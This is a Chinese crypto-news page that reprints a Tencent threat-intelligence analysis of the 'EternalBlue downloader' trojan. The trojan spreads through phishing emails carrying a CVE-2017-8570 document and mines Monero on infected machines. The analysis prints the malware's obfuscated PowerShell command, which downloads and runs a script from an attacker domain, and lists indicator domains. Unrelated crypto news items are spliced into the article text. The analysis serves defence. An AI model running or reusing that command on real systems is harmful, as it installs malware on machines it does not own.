火星链 火星链
Ctrl+D收藏火星链
首页 > 莱特币 > 正文

CBD:“永恒之蓝下载器木马”新增钓鱼邮件传播,利用用户机器挖矿门罗币

作者:

时间:1900/1/1 0:00:00

来源:腾讯御见威胁情报中心

编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞攻击代码。

55,000,000 USDT从未知钱包转移到GateIO:金色财经报道,数据显示,55,000,000 USDT (价值约54,649,650美元)从未知钱包转移到GateIO。[2023/4/19 14:12:44]

如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

日本信用卡发行商JCB拟于今年进行引入CBDC的实证实验:10月24日消息,据外媒报道,日本信用卡发行商JCB计划于今年内进行引入CBDC的实证实验,拟通过准备一种模拟CBDC的数字货币,以确认是否可以利用现有的信用卡来安全地进行结算。JCB拥有独立的国际结算网络,拥有3900万商户。如果证实CBDC可以在现有的基础设施中使用,那么实际引入时就有可能以较低的成本做出响应,从而增加其优势。

报道称,日本央行尚未决定是否发行CBDC,但正在进行实证实验。日本央行在今年春天开始的CBDC实证实验的“第二阶段”中,将确认是否可实现CBDC离线支付功能和持有金额上限等功能,其还设想了通过企业流通CBDC的机制。可以说,JCB的实验与日本央行的行动步调一致。(日经新闻)[2022/10/24 16:36:47]

而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。

Zipmex宣布暂停提款后,其Token已下跌40%:7月21日消息,据派盾(PeckShield)监测显示,加密交易平台Zipmex Token ZMT在暂停提款公告出来后已下跌40%。[2022/7/21 2:28:03]

本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表:

安全建议

1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀软件进行扫描;

2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用WindowsUpdate进行。

IOCs

http//t.awcna.com/mail.jsp

标签:CBDBDCCOMSHELLCBD CoinBDC币PegHub.comSHELL价格

莱特币热门资讯
ETH:加密市场Q1数据综合复盘:比特币其实只跌了10%

文:秦晓峰出品:Odaily星球日报编者注:本文作了不改变作者原意的删减。新十年的开局,糟透了。2020年前3个月,不少人做过的最“了不起”的一件事,就是见证历史.

1900/1/1 0:00:00
FTX:下架FTX后币安杀入期权市场,为何选择与众不同“美式期权”?

币安最近可谓十分吸睛,下架了自己投资的FTX代币,又准备上线期权、矿池等新业务。币安的期权有什么不一样?4月3日币安官方Twitter发布消息,透漏TestFlight截图,上面显示“支持期权交.

1900/1/1 0:00:00
ARY:币安收购CoinMarketCap,到底有什么“阴谋”?| 链节点AMA

4月2日,币安收购行情数据网站CoinMarketCap的消息官宣,具体金额未知。这一爆炸性消息引发圈内的热议.

1900/1/1 0:00:00
ASH:区块链安全性的洋葱模型:每一层都增加了额外的安全性

作者:DeribitMarketResearch翻译:子铭来源:加密谷编者注:原标题为《区块链安全性的洋葱模型》根据经验来看公链是安全的,在其大部分历史上,它们已成功的达到其设计目的.

1900/1/1 0:00:00
ELLO:2020 Q1区块链领域投融资复盘:投融资82笔,披露总融资额超过11.7亿美元

来源:星球日报编者注:原标题为《2020Q1区块链领域投融资复盘》2020年第一季度,全球金融市场屡遭黑天鹅事件,主要国家多有宏观层面的政策调整.

1900/1/1 0:00:00
BOOK:Facebook 更新Libra白皮书!为迎合监管,已进行四大重要修改

作者:Joyce来源:区块链前哨4月16日,Facebook更新了Libra白皮书,2019年6月发表的辅助技术论文已被编辑或淘汰.

1900/1/1 0:00:00